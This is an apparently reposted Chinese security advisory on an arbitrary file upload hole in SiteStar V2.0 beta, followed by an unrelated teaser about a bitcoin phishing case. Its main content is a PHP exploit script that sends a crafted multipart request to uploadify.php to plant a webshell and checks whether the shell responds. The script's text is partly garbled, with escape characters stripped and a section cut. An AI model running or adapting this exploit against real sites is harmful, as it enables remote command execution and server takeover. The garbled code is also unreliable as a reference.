发布日期:2011-03.16
发布作者:cnryan
影响版本:SiteStar V2.0 beta
官方网站:http://www.sitestar.cn/
漏洞类型:文件上传
[1]漏洞概述:
SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。
[2]漏洞分析:
漏洞产生在 /script/multiupload/uploadify.php 文件:
没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。
print_r(' +---------------------------------------------------------------------------+ SiteStar V2.0 Remote Shell Upload Exploit by cnryan Mail: cnryan2008[at]gmail[dot]com Blog: http://hi.baidu.com/cnryan +---------------------------------------------------------------------------+ '); if ($argc W.S.Trn-----cnryanrn"; $payload .= "Content-Disposition: form-data; name="upload"rnrnrn"; $payload .= "-----cnryanrn"; $payload .= "Content-Disposition: form-data; name="folder"rnrn"; $payload .= "$pathrn"; $payload .= "-----cnryan--"; $packet = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0rn"; $packet .= "Host: {$host}rn"; $packet .= "Connection: keep-alivern"; $packet .= "Content-Type: multipart/form-data; boundary=---cnryanrn"; $packet .= "Content-Length: ".strlen($payload)."rnrn"; $packet .= $payload; $fp = fsockopen($host, 80); fputs($fp, $packet); sleep(5); $str=file_get_contents($shell); if(strpos($str,'W.S.T')) exit("OK! Got shell:t$shelln"); else exit("Exploit Failed!n"); ?>
[4]漏洞状态:
漏洞已通知厂商。
[5]厂商回复:
感谢您的反馈,谢谢!
老洞,纯属收集,转自:http://hi.baidu.com/cnryan/blog/item/0d0a4377d9f6790fb151b9e6.html
文章来源于lcx.cc:建站之星 SiteStar V2.0 任意文件上传漏洞
奇葩的比特币钓鱼案例 rayh4c | 2013-12-04 16:19 昨天有个比特币被盗的事太有意思了~~~~ 有骗子在某交易市场论坛用"漏洞"改了个和官方版主一样的昵称,然后发了个贴交大家怎么快速转账到该交易市场,可以少收手续费。 于是血案发生了,大家开…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论